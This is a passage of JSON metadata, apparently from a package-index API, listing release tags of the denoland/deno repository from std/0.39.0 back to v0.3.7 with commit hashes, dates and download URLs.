.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codelo